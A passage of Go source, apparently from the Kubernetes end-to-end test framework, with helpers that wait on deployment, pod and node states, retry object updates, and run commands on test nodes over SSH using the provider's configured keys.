if deployment.Status.ObservedGeneration >= desiredGeneration && deployment.Status.UpdatedReplicas >= minUpdatedReplicas {
return true, nil
}
return false, nil
})
if err != nil {
return fmt.Errorf("error waiting for deployment %s to have at least %d updpatedReplicas: %v", deploymentName, minUpdatedReplicas, err)
}
return nil
}
// WaitForDeploymentRollbackCleared waits for given deployment either started rolling back or doesn't need to rollback.
// Note that rollback should be cleared shortly, so we only wait for 1 minute here to fail early.
func WaitForDeploymentRollbackCleared(c clientset.Interface, ns, deploymentName string) error {
err := wait.Poll(Poll, 1*time.Minute, func() (bool, error) {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
// Rollback not set or is kicked off
if deployment.Spec.RollbackTo == nil {
return true, nil
}
return false, nil
})
if err != nil {
return fmt.Errorf("error waiting for deployment %s rollbackTo to be cleared: %v", deploymentName, err)
}
return nil
}
// WatchRecreateDeployment watches Recreate deployments and ensures no new pods will run at the same time with
// old pods.
func WatchRecreateDeployment(c clientset.Interface, d *extensions.Deployment) error {
if d.Spec.Strategy.Type != extensions.RecreateDeploymentStrategyType {
return fmt.Errorf("deployment %q does not use a Recreate strategy: %s", d.Name, d.Spec.Strategy.Type)
}
w, err := c.Extensions().Deployments(d.Namespace).Watch(metav1.SingleObject(metav1.ObjectMeta{Name: d.Name, ResourceVersion: d.ResourceVersion}))
if err != nil {
return err
}
status := d.Status
condition := func(event watch.Event) (bool, error) {
d := event.Object.(*extensions.Deployment)
status = d.Status
if d.Status.UpdatedReplicas > 0 && d.Status.Replicas != d.Status.UpdatedReplicas {
_, allOldRSs, err := deploymentutil.GetOldReplicaSets(d, c)
newRS, nerr := deploymentutil.GetNewReplicaSet(d, c)
if err == nil && nerr == nil {
Logf("%+v", d)
logReplicaSetsOfDeployment(d, allOldRSs, newRS)
logPodsOfDeployment(c, d, append(allOldRSs, newRS))
}
return false, fmt.Errorf("deployment %q is running new pods alongside old pods: %#v", d.Name, status)
}
return *(d.Spec.Replicas) == d.Status.Replicas &&
*(d.Spec.Replicas) == d.Status.UpdatedReplicas &&
d.Generation <= d.Status.ObservedGeneration, nil
}
_, err = watch.Until(2*time.Minute, w, condition)
if err == wait.ErrWaitTimeout {
err = fmt.Errorf("deployment %q never completed: %#v", d.Name, status)
}
return err
}
// WaitForDeploymentRevisionAndImage waits for the deployment's and its new RS's revision and container image to match the given revision and image.
// Note that deployment revision and its new RS revision should be updated shortly, so we only wait for 1 minute here to fail early.
func WaitForDeploymentRevisionAndImage(c clientset.Interface, ns, deploymentName string, revision, image string) error {
return testutil.WaitForDeploymentRevisionAndImage(c, ns, deploymentName, revision, image, Logf, Poll, pollShortTimeout)
}
// CheckNewRSAnnotations check if the new RS's annotation is as expected
func CheckNewRSAnnotations(c clientset.Interface, ns, deploymentName string, expectedAnnotations map[string]string) error {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return err
}
newRS, err := deploymentutil.GetNewReplicaSet(deployment, c)
if err != nil {
return err
}
for k, v := range expectedAnnotations {
// Skip checking revision annotations
if k != deploymentutil.RevisionAnnotation && v != newRS.Annotations[k] {
return fmt.Errorf("Expected new RS annotations = %+v, got %+v", expectedAnnotations, newRS.Annotations)
}
}
return nil
}
func WaitForPodsReady(c clientset.Interface, ns, name string, minReadySeconds int) error {
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": name}))
options := metav1.ListOptions{LabelSelector: label.String()}
return wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
pods, err := c.Core().Pods(ns).List(options)
if err != nil {
return false, nil
}
for _, pod := range pods.Items {
if !podutil.IsPodAvailable(&pod, int32(minReadySeconds), metav1.Now()) {
return false, nil
}
}
return true, nil
})
}
// Waits for the deployment to clean up old rcs.
func WaitForDeploymentOldRSsNum(c clientset.Interface, ns, deploymentName string, desiredRSNum int) error {
var oldRSs []*extensions.ReplicaSet
var d *extensions.Deployment
pollErr := wait.PollImmediate(Poll, 5*time.Minute, func() (bool, error) {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
d = deployment
_, oldRSs, err = deploymentutil.GetOldReplicaSets(deployment, c)
if err != nil {
return false, err
}
return len(oldRSs) == desiredRSNum, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("%d old replica sets were not cleaned up for deployment %q", len(oldRSs)-desiredRSNum, deploymentName)
logReplicaSetsOfDeployment(d, oldRSs, nil)
}
return pollErr
}
func logReplicaSetsOfDeployment(deployment *extensions.Deployment, allOldRSs []*extensions.ReplicaSet, newRS *extensions.ReplicaSet) {
testutil.LogReplicaSetsOfDeployment(deployment, allOldRSs, newRS, Logf)
}
func WaitForObservedDeployment(c clientset.Interface, ns, deploymentName string, desiredGeneration int64) error {
return deploymentutil.WaitForObservedDeployment(func() (*extensions.Deployment, error) {
return c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
}, desiredGeneration, Poll, 1*time.Minute)
}
func WaitForDeploymentWithCondition(c clientset.Interface, ns, deploymentName, reason string, condType extensions.DeploymentConditionType) error {
var deployment *extensions.Deployment
pollErr := wait.PollImmediate(time.Second, 5*time.Minute, func() (bool, error) {
d, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
deployment = d
cond := deploymentutil.GetDeploymentCondition(deployment.Status, condType)
return cond != nil && cond.Reason == reason, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("deployment %q never updated with the desired condition and reason: %v", deployment.Name, deployment.Status.Conditions)
_, allOldRSs, newRS, err := deploymentutil.GetAllReplicaSets(deployment, c)
if err == nil {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, append(allOldRSs, newRS))
}
}
return pollErr
}
func logPodsOfDeployment(c clientset.Interface, deployment *extensions.Deployment, rsList []*extensions.ReplicaSet) {
testutil.LogPodsOfDeployment(c, deployment, rsList, Logf)
}
// Waits for the number of events on the given object to reach a desired count.
func WaitForEvents(c clientset.Interface, ns string, objOrRef runtime.Object, desiredEventsCount int) error {
return wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
events, err := c.Core().Events(ns).Search(api.Scheme, objOrRef)
if err != nil {
return false, fmt.Errorf("error in listing events: %s", err)
}
eventsCount := len(events.Items)
if eventsCount == desiredEventsCount {
return true, nil
}
if eventsCount < desiredEventsCount {
return false, nil
}
// Number of events has exceeded the desired count.
return false, fmt.Errorf("number of events has exceeded the desired count, eventsCount: %d, desiredCount: %d", eventsCount, desiredEventsCount)
})
}
// Waits for the number of events on the given object to be at least a desired count.
func WaitForPartialEvents(c clientset.Interface, ns string, objOrRef runtime.Object, atLeastEventsCount int) error {
return wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
events, err := c.Core().Events(ns).Search(api.Scheme, objOrRef)
if err != nil {
return false, fmt.Errorf("error in listing events: %s", err)
}
eventsCount := len(events.Items)
if eventsCount >= atLeastEventsCount {
return true, nil
}
return false, nil
})
}
type updateDeploymentFunc func(d *extensions.Deployment)
func UpdateDeploymentWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateDeploymentFunc) (deployment *extensions.Deployment, err error) {
deployments := c.Extensions().Deployments(namespace)
var updateErr error
pollErr := wait.Poll(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
if deployment, err = deployments.Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(deployment)
if deployment, err = deployments.Update(deployment); err == nil {
Logf("Updating deployment %s", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to deployment %q: %v", name, updateErr)
}
return deployment, pollErr
}
type updateRsFunc func(d *extensions.ReplicaSet)
func UpdateReplicaSetWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateRsFunc) (*extensions.ReplicaSet, error) {
var rs *extensions.ReplicaSet
var updateErr error
pollErr := wait.PollImmediate(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
var err error
if rs, err = c.Extensions().ReplicaSets(namespace).Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(rs)
if rs, err = c.Extensions().ReplicaSets(namespace).Update(rs); err == nil {
Logf("Updating replica set %q", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to replicaset %q: %v", name, updateErr)
}
return rs, pollErr
}
type updateRcFunc func(d *v1.ReplicationController)
func UpdateReplicationControllerWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateRcFunc) (*v1.ReplicationController, error) {
var rc *v1.ReplicationController
var updateErr error
pollErr := wait.PollImmediate(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
var err error
if rc, err = c.Core().ReplicationControllers(namespace).Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(rc)
if rc, err = c.Core().ReplicationControllers(namespace).Update(rc); err == nil {
Logf("Updating replication controller %q", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to rc %q: %v", name, updateErr)
}
return rc, pollErr
}
type updateStatefulSetFunc func(*apps.StatefulSet)
func UpdateStatefulSetWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateStatefulSetFunc) (statefulSet *apps.StatefulSet, err error) {
statefulSets := c.Apps().StatefulSets(namespace)
var updateErr error
pollErr := wait.Poll(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
if statefulSet, err = statefulSets.Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(statefulSet)
if statefulSet, err = statefulSets.Update(statefulSet); err == nil {
Logf("Updating stateful set %s", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to stateful set %q: %v", name, updateErr)
}
return statefulSet, pollErr
}
type updateJobFunc func(*batch.Job)
func UpdateJobWithRetries(c clientset.Interface, namespace, name string, applyUpdate updateJobFunc) (job *batch.Job, err error) {
jobs := c.Batch().Jobs(namespace)
var updateErr error
pollErr := wait.PollImmediate(10*time.Millisecond, 1*time.Minute, func() (bool, error) {
if job, err = jobs.Get(name, metav1.GetOptions{}); err != nil {
return false, err
}
// Apply the update, then attempt to push it to the apiserver.
applyUpdate(job)
if job, err = jobs.Update(job); err == nil {
Logf("Updating job %s", name)
return true, nil
}
updateErr = err
return false, nil
})
if pollErr == wait.ErrWaitTimeout {
pollErr = fmt.Errorf("couldn't apply the provided updated to job %q: %v", name, updateErr)
}
return job, pollErr
}
// NodeAddresses returns the first address of the given type of each node.
func NodeAddresses(nodelist *v1.NodeList, addrType v1.NodeAddressType) []string {
hosts := []string{}
for _, n := range nodelist.Items {
for _, addr := range n.Status.Addresses {
// Use the first external IP address we find on the node, and
// use at most one per node.
// TODO(roberthbailey): Use the "preferred" address for the node, once
// such a thing is defined (#2462).
if addr.Type == addrType {
hosts = append(hosts, addr.Address)
break
}
}
}
return hosts
}
// NodeSSHHosts returns SSH-able host names for all schedulable nodes - this excludes master node.
// It returns an error if it can't find an external IP for every node, though it still returns all
// hosts that it found in that case.
func NodeSSHHosts(c clientset.Interface) ([]string, error) {
nodelist := waitListSchedulableNodesOrDie(c)
// TODO(roberthbailey): Use the "preferred" address for the node, once such a thing is defined (#2462).
hosts := NodeAddresses(nodelist, v1.NodeExternalIP)
// Error if any node didn't have an external IP.
if len(hosts) != len(nodelist.Items) {
return hosts, fmt.Errorf(
"only found %d external IPs on nodes, but found %d nodes. Nodelist: %v",
len(hosts), len(nodelist.Items), nodelist)
}
sshHosts := make([]string, 0, len(hosts))
for _, h := range hosts {
sshHosts = append(sshHosts, net.JoinHostPort(h, sshPort))
}
return sshHosts, nil
}
type SSHResult struct {
User string
Host string
Cmd string
Stdout string
Stderr string
Code int
}
// NodeExec execs the given cmd on node via SSH. Note that the nodeName is an sshable name,
// eg: the name returned by framework.GetMasterHost(). This is also not guaranteed to work across
// cloud providers since it involves ssh.
func NodeExec(nodeName, cmd string) (SSHResult, error) {
return SSH(cmd, net.JoinHostPort(nodeName, sshPort), TestContext.Provider)
}
// SSH synchronously SSHs to a node running on provider and runs cmd. If there
// is no error performing the SSH, the stdout, stderr, and exit code are
// returned.
func SSH(cmd, host, provider string) (SSHResult, error) {
result := SSHResult{Host: host, Cmd: cmd}
// Get a signer for the provider.
signer, err := GetSigner(provider)
if err != nil {
return result, fmt.Errorf("error getting signer for provider %s: '%v'", provider, err)
}
// RunSSHCommand will default to Getenv("USER") if user == "", but we're
// defaulting here as well for logging clarity.
result.User = os.Getenv("KUBE_SSH_USER")
if result.User == "" {
result.User = os.Getenv("USER")
}
stdout, stderr, code, err := sshutil.RunSSHCommand(cmd, result.User, host, signer)
result.Stdout = stdout
result.Stderr = stderr
result.Code = code
return result, err
}
func LogSSHResult(result SSHResult) {
remote := fmt.Sprintf("%s@%s", result.User, result.Host)
Logf("ssh %s: command: %s", remote, result.Cmd)
Logf("ssh %s: stdout: %q", remote, result.Stdout)
Logf("ssh %s: stderr: %q", remote, result.Stderr)
Logf("ssh %s: exit code: %d", remote, result.Code)
}
func IssueSSHCommandWithResult(cmd, provider string, node *v1.Node) (*SSHResult, error) {
Logf("Getting external IP address for %s", node.Name)
host := ""
for _, a := range node.Status.Addresses {
if a.Type == v1.NodeExternalIP {
host = net.JoinHostPort(a.Address, sshPort)
break
}
}
if host == "" {
return nil, fmt.Errorf("couldn't find external IP address for node %s", node.Name)
}
Logf("SSH %q on %s(%s)", cmd, node.Name, host)
result, err := SSH(cmd, host, provider)
LogSSHResult(result)
if result.Code != 0 || err != nil {
return nil, fmt.Errorf("failed running %q: %v (exit code %d)",
cmd, err, result.Code)
}
return &result, nil
}
func IssueSSHCommand(cmd, provider string, node *v1.Node) error {
_, err := IssueSSHCommandWithResult(cmd, provider, node)
if err != nil {
return err
}
return nil
}
// NewHostExecPodSpec returns the pod spec of hostexec pod
func NewHostExecPodSpec(ns, name string) *v1.Pod {
immediate := int64(0)
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: name,
Namespace: ns,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "hostexec",
Image: "gcr.io/google_containers/hostexec:1.2",
ImagePullPolicy: v1.PullIfNotPresent,
},
},
HostNetwork: true,
SecurityContext: &v1.PodSecurityContext{},
TerminationGracePeriodSeconds: &immediate,
},
}
return pod
}
// RunHostCmd runs the given cmd in the context of the given pod using `kubectl exec`
// inside of a shell.
func RunHostCmd(ns, name, cmd string) (string, error) {
return RunKubectl("exec", fmt.Sprintf("--namespace=%v", ns), name, "--", "/bin/sh", "-c", cmd)
}
// RunHostCmdOrDie calls RunHostCmd and dies on error.
func RunHostCmdOrDie(ns, name, cmd string) string {
stdout, err := RunHostCmd(ns, name, cmd)
Logf("stdout: %v", stdout)
ExpectNoError(err)
return stdout
}
// LaunchHostExecPod launches a hostexec pod in the given namespace and waits
// until it's Running
func LaunchHostExecPod(client clientset.Interface, ns, name string) *v1.Pod {
hostExecPod := NewHostExecPodSpec(ns, name)
pod, err := client.Core().Pods(ns).Create(hostExecPod)
ExpectNoError(err)
err = WaitForPodRunningInNamespace(client, pod)
ExpectNoError(err)
return pod
}
// newExecPodSpec returns the pod spec of exec pod
func newExecPodSpec(ns, generateName string) *v1.Pod {
immediate := int64(0)
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
GenerateName: generateName,
Namespace: ns,
},
Spec: v1.PodSpec{
TerminationGracePeriodSeconds: &immediate,
Containers: []v1.Container{
{
Name: "exec",
Image: "gcr.io/google_containers/busybox:1.24",
Command: []string{"sh", "-c", "while true; do sleep 5; done"},
},
},
},
}
return pod
}
// CreateExecPodOrFail creates a simple busybox pod in a sleep loop used as a
// vessel for kubectl exec commands.
// Returns the name of the created pod.
func CreateExecPodOrFail(client clientset.Interface, ns, generateName string, tweak func(*v1.Pod)) string {
Logf("Creating new exec pod")
execPod := newExecPodSpec(ns, generateName)
if tweak != nil {
tweak(execPod)
}
created, err := client.Core().Pods(ns).Create(execPod)
Expect(err).NotTo(HaveOccurred())
err = wait.PollImmediate(Poll, 5*time.Minute, func() (bool, error) {
retrievedPod, err := client.Core().Pods(execPod.Namespace).Get(created.Name, metav1.GetOptions{})
if err != nil {
return false, nil
}
return retrievedPod.Status.Phase == v1.PodRunning, nil
})
Expect(err).NotTo(HaveOccurred())
return created.Name
}
func CreatePodOrFail(c clientset.Interface, ns, name string, labels map[string]string, containerPorts []v1.ContainerPort) {
By(fmt.Sprintf("Creating pod %s in namespace %s", name, ns))
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: name,
Labels: labels,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "pause",
Image: GetPauseImageName(c),
Ports: containerPorts,
// Add a dummy environment variable to work around a docker issue.
// https://github.com/docker/docker/issues/14203
Env: []v1.EnvVar{{Name: "FOO", Value: " "}},
},
},
},
}
_, err := c.Core().Pods(ns).Create(pod)
Expect(err).NotTo(HaveOccurred())
}
func DeletePodOrFail(c clientset.Interface, ns, name string) {
By(fmt.Sprintf("Deleting pod %s in namespace %s", name, ns))
err := c.Core().Pods(ns).Delete(name, nil)
Expect(err).NotTo(HaveOccurred())
}
// GetSigner returns an ssh.Signer for the provider ("gce", etc.) that can be
// used to SSH to their nodes.
func GetSigner(provider string) (ssh.Signer, error) {
// Get the directory in which SSH keys are located.
keydir := filepath.Join(os.Getenv("HOME"), ".ssh")
// Select the key itself to use. When implementing more providers here,
// please also add them to any SSH tests that are disabled because of signer
// support.
keyfile := ""
key := ""
switch provider {
case "gce", "gke", "kubemark":
keyfile = "google_compute_engine"
case "aws":
// If there is an env. variable override, use that.
aws_keyfile := os.Getenv("AWS_SSH_KEY")
if len(aws_keyfile) != 0 {
return sshutil.MakePrivateKeySignerFromFile(aws_keyfile)
}
// Otherwise revert to home dir
keyfile = "kube_aws_rsa"
case "vagrant":
keyfile = os.Getenv("VAGRANT_SSH_KEY")
if len(keyfile) != 0 {
return sshutil.MakePrivateKeySignerFromFile(keyfile)
}
return nil, fmt.Errorf("VAGRANT_SSH_KEY env variable should be provided")
case "local", "vsphere":
keyfile = os.Getenv("LOCAL_SSH_KEY") // maybe?
if len(keyfile) == 0 {
keyfile = "id_rsa"
}
default:
return nil, fmt.Errorf("GetSigner(...) not implemented for %s", provider)
}
if len(key) == 0 {
key = filepath.Join(keydir, keyfile)
}
return sshutil.MakePrivateKeySignerFromFile(key)
}
// CheckPodsRunningReady returns whether all pods whose names are listed in
// podNames in namespace ns are running and ready, using c and waiting at most
// timeout.
func CheckPodsRunningReady(c clientset.Interface, ns string, podNames []string, timeout time.Duration) bool {
return CheckPodsCondition(c, ns, podNames, timeout, testutils.PodRunningReady, "running and ready")
}
// CheckPodsRunningReadyOrSucceeded returns whether all pods whose names are
// listed in podNames in namespace ns are running and ready, or succeeded; use
// c and waiting at most timeout.
func CheckPodsRunningReadyOrSucceeded(c clientset.Interface, ns string, podNames []string, timeout time.Duration) bool {
return CheckPodsCondition(c, ns, podNames, timeout, testutils.PodRunningReadyOrSucceeded, "running and ready, or succeeded")
}
// CheckPodsCondition returns whether all pods whose names are listed in podNames
// in namespace ns are in the condition, using c and waiting at most timeout.
func CheckPodsCondition(c clientset.Interface, ns string, podNames []string, timeout time.Duration, condition podCondition, desc string) bool {
np := len(podNames)
Logf("Waiting up to %v for %d pods to be %s: %s", timeout, np, desc, podNames)
result := make(chan bool, len(podNames))
for _, podName := range podNames {
// Launch off pod readiness checkers.
go func(name string) {
err := WaitForPodCondition(c, ns, name, desc, timeout, condition)
result <- err == nil
}(podName)
}
// Wait for them all to finish.
success := true
// TODO(a-robinson): Change to `for range` syntax and remove logging once we
// support only Go >= 1.4.
for _, podName := range podNames {
if !<-result {
Logf("Pod %[1]s failed to be %[2]s.", podName, desc)
success = false
}
}
Logf("Wanted all %d pods to be %s. Result: %t. Pods: %v", np, desc, success, podNames)
return success
}
// WaitForNodeToBeReady returns whether node name is ready within timeout.
func WaitForNodeToBeReady(c clientset.Interface, name string, timeout time.Duration) bool {
return WaitForNodeToBe(c, name, v1.NodeReady, true, timeout)
}
// WaitForNodeToBeNotReady returns whether node name is not ready (i.e. the
// readiness condition is anything but ready, e.g false or unknown) within
// timeout.
func WaitForNodeToBeNotReady(c clientset.Interface, name string, timeout time.Duration) bool {
return WaitForNodeToBe(c, name, v1.NodeReady, false, timeout)
}
func isNodeConditionSetAsExpected(node *v1.Node, conditionType v1.NodeConditionType, wantTrue, silent bool) bool {
// Check the node readiness condition (logging all).
for _, cond := range node.Status.Conditions {
// Ensure that the condition type and the status matches as desired.
if cond.Type == conditionType {
// For NodeReady condition we need to check Taints as well
if cond.Type == v1.NodeReady {
hasNodeControllerTaints := false
// For NodeReady we need to check if Taints are gone as well
taints := node.Spec.Taints
for _, taint := range taints {
if taint.MatchTaint(nodectlr.UnreachableTaintTemplate) || taint.MatchTaint(nodectlr.NotReadyTaintTemplate) {
hasNodeControllerTaints = true
break
}
}
if wantTrue {
if (cond.Status == v1.ConditionTrue) && !hasNodeControllerTaints {
return true
} else {
msg := ""
if !hasNodeControllerTaints {
msg = fmt.Sprintf("Condition %s of node %s is %v instead of %t. Reason: %v, message: %v",
conditionType, node.Name, cond.Status == v1.ConditionTrue, wantTrue, cond.Reason, cond.Message)
} else {
msg = fmt.Sprintf("Condition %s of node %s is %v, but Node is tainted by NodeController with %v. Failure",
conditionType, node.Name, cond.Status == v1.ConditionTrue, taints)
}
if !silent {
Logf(msg)
}
return false
}
} else {
// TODO: check if the Node is tainted once we enable NC notReady/unreachable taints by default
if cond.Status != v1.ConditionTrue {
return true
}
if !silent {
Logf("Condition %s of node %s is %v instead of %t. Reason: %v, message: %v",
conditionType, node.Name, cond.Status == v1.ConditionTrue, wantTrue, cond.Reason, cond.Message)
}
return false
}
}
if (wantTrue && (cond.Status == v1.ConditionTrue)) || (!wantTrue && (cond.Status != v1.ConditionTrue)) {
return true
} else {
if !silent {
Logf("Condition %s of node %s is %v instead of %t. Reason: %v, message: %v",
conditionType, node.Name, cond.Status == v1.ConditionTrue, wantTrue, cond.Reason, cond.Message)
}
return false
}
}
}
if !silent {
Logf("Couldn't find condition %v on node %v", conditionType, node.Name)
}
return false
}
func IsNodeConditionSetAsExpected(node *v1.Node, conditionType v1.NodeConditionType, wantTrue bool) bool {
return isNodeConditionSetAsExpected(node, conditionType, wantTrue, false)
}
func IsNodeConditionSetAsExpectedSilent(node *v1.Node, conditionType v1.NodeConditionType, wantTrue bool) bool {
return isNodeConditionSetAsExpected(node, conditionType, wantTrue, true)
}
func IsNodeConditionUnset(node *v1.Node, conditionType v1.NodeConditionType) bool {
for _, cond := range node.Status.Conditions {
if cond.Type == conditionType {
return false
}
}
return true
}
// WaitForNodeToBe returns whether node "name's" condition state matches wantTrue
// within timeout. If wantTrue is true, it will ensure the node condition status
// is ConditionTrue; if it's false, it ensures the node condition is in any state
// other than ConditionTrue (e.g. not true or unknown).
func WaitForNodeToBe(c clientset.Interface, name string, conditionType v1.NodeConditionType, wantTrue bool, timeout time.Duration) bool {
Logf("Waiting up to %v for node %s condition %s to be %t", timeout, name, conditionType, wantTrue)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
node, err := c.Core().Nodes().Get(name, metav1.GetOptions{})
if err != nil {
Logf("Couldn't get node %s", name)
continue
}
if IsNodeConditionSetAsExpected(node, conditionType, wantTrue) {
return true
}
}
Logf("Node %s didn't reach desired %s condition status (%t) within %v", name, conditionType, wantTrue, timeout)
return false
}
// Checks whether not-ready nodes can be ignored while checking if all nodes are
// ready (we allow e.g. for incorrect provisioning of some small percentage of nodes
// while validating cluster, and those nodes may never become healthy).
// Currently we allow only for:
// - not present CNI plugins on node
// TODO: we should extend it for other reasons.
func allowedNotReadyReasons(nodes []*v1.Node) bool {
for _, node := range nodes {
index, condition := nodeutil.GetNodeCondition(&node.Status, v1.NodeReady)
if index == -1 ||
!strings.Contains(condition.Message, "could not locate kubenet required CNI plugins") {
return false
}
}
return true
}
// Checks whether all registered nodes are ready.
// TODO: we should change the AllNodesReady call in AfterEach to WaitForAllNodesHealthy,
// and figure out how to do it in a configurable way, as we can't expect all setups to run
// default test add-ons.
func AllNodesReady(c clientset.Interface, timeout time.Duration) error {
Logf("Waiting up to %v for all (but %d) nodes to be ready", timeout, TestContext.AllowedNotReadyNodes)
var notReady []*v1.Node
err := wait.PollImmediate(Poll, timeout, func() (bool, error) {
notReady = nil
// It should be OK to list unschedulable Nodes here.
nodes, err := c.Core().Nodes().List(metav1.ListOptions{})
if err != nil {
return false, err
}
for i := range nodes.Items {
node := &nodes.Items[i]
if !IsNodeConditionSetAsExpected(node, v1.NodeReady, true) {
notReady = append(notReady, node)
}
}
// Framework allows for <TestContext.AllowedNotReadyNodes> nodes to be non-ready,
// to make it possible e.g. for incorrect deployment of some small percentage
// of nodes (which we allow in cluster validation). Some nodes that are not
// provisioned correctly at startup will never become ready (e.g. when something
// won't install correctly), so we can't expect them to be ready at any point.
//
// However, we only allow non-ready nodes with some specific reasons.
if len(notReady) > TestContext.AllowedNotReadyNodes {
return false, nil
}
return allowedNotReadyReasons(notReady), nil
})
if err != nil && err != wait.ErrWaitTimeout {
return err
}
if len(notReady) > TestContext.AllowedNotReadyNodes || !allowedNotReadyReasons(notReady) {
msg := ""
for _, node := range notReady {
msg = fmt.Sprintf("%s, %s", msg, node.Name)
}
return fmt.Errorf("Not ready nodes: %#v", msg)
}
return nil
}
// checks whether all registered nodes are ready and all required Pods are running on them.
func WaitForAllNodesHealthy(c clientset.Interface, timeout time.Duration) error {
Logf("Waiting up to %v for all nodes to be ready", timeout)
var notReady []v1.Node
var missingPodsPerNode map[string][]string
err := wait.PollImmediate(Poll, timeout, func() (bool, error) {
notReady = nil
// It should be OK to list unschedulable Nodes here.
nodes, err := c.Core().Nodes().List(metav1.ListOptions{ResourceVersion: "0"})
if err != nil {
return false, err
}
for _, node := range nodes.Items {
if !IsNodeConditionSetAsExpected(&node, v1.NodeReady, true) {
notReady = append(notReady, node)
}
}
pods, err := c.Core().Pods(metav1.NamespaceAll).List(metav1.ListOptions{ResourceVersion: "0"})
if err != nil {
return false, err
}
systemPodsPerNode := make(map[string][]string)
for _, pod := range pods.Items {
if pod.Namespace == metav1.NamespaceSystem && pod.Status.Phase == v1.PodRunning {
if pod.Spec.NodeName != "" {
systemPodsPerNode[pod.Spec.NodeName] = append(systemPodsPerNode[pod.Spec.NodeName], pod.Name)
}
}
}
missingPodsPerNode = make(map[string][]string)
for _, node := range nodes.Items {
if !system.IsMasterNode(node.Name) {
for _, requiredPod := range requiredPerNodePods {
foundRequired := false
for _, presentPod := range systemPodsPerNode[node.Name] {
if requiredPod.MatchString(presentPod) {
foundRequired = true
break
}
}
if !foundRequired {
missingPodsPerNode[node.Name] = append(missingPodsPerNode[node.Name], requiredPod.String())
}
}
}
}
return len(notReady) == 0 && len(missingPodsPerNode) == 0, nil
})
if err != nil && err != wait.ErrWaitTimeout {
return err
}
if len(notReady) > 0 {
return fmt.Errorf("Not ready nodes: %v", notReady)
}
if len(missingPodsPerNode) > 0 {
return fmt.Errorf("Not running system Pods: %v", missingPodsPerNode)
}
return nil
}
// Filters nodes in NodeList in place, removing nodes that do not
// satisfy the given condition
// TODO: consider merging with pkg/client/cache.NodeLister
func FilterNodes(nodeList *v1.NodeList, fn func(node v1.Node) bool) {
var l []v1.Node
for _, node := range nodeList.Items {
if fn(node) {
l = append(l, node)
}
}
nodeList.Items = l
}
// ParseKVLines parses output that looks like lines containing "<key>: <val>"
// and returns <val> if <key> is found. Otherwise, it returns the empty string.
func ParseKVLines(output, key string) string {
delim := ":"
key = key + delim
for _, line := range strings.Split(output, "\n") {
pieces := strings.SplitAfterN(line, delim, 2)
if len(pieces) != 2 {
continue
}
k, v := pieces[0], pieces[1]
if k == key {
return strings.TrimSpace(v)
}
}
return ""
}
func RestartKubeProxy(host string) error {
// TODO: Make it work for all providers.
if !ProviderIs("gce", "gke", "aws") {
return fmt.Errorf("unsupported provider: %s", TestContext.Provider)
}
// kubelet will restart the kube-proxy since it's running in a static pod
Logf("Killing kube-proxy on node %v", host)
result, err := SSH("sudo pkill kube-proxy", host, TestContext.Provider)
if err != nil || result.Code != 0 {
LogSSHResult(result)
return fmt.Errorf("couldn't restart kube-proxy: %v", err)
}
// wait for kube-proxy to come back up
sshCmd := "sudo /bin/sh -c 'pgrep kube-proxy | wc -l'"
err = wait.Poll(5*time.Second, 60*time.Second, func() (bool, error) {
Logf("Waiting for kubeproxy to come back up with %v on %v", sshCmd, host)
result, err := SSH(sshCmd, host, TestContext.Provider)
if err != nil {
return false, err
}
if result.Code != 0 {
LogSSHResult(result)
return false, fmt.Errorf("failed to run command, exited %d", result.Code)
}
if result.Stdout == "0\n" {
return false, nil
}
Logf("kube-proxy is back up.")
return true, nil
})
if err != nil {
return fmt.Errorf("kube-proxy didn't recover: %v", err)
}
return nil
}
func RestartApiserver(c discovery.ServerVersionInterface) error {
// TODO: Make it work for all providers.
if !ProviderIs("gce", "gke", "aws") {
return fmt.Errorf("unsupported provider: %s", TestContext.Provider)
}
if ProviderIs("gce", "aws") {
return sshRestartMaster()
}
// GKE doesn't allow ssh access, so use a same-version master
// upgrade to teardown/recreate master.
v, err := c.ServerVersion()
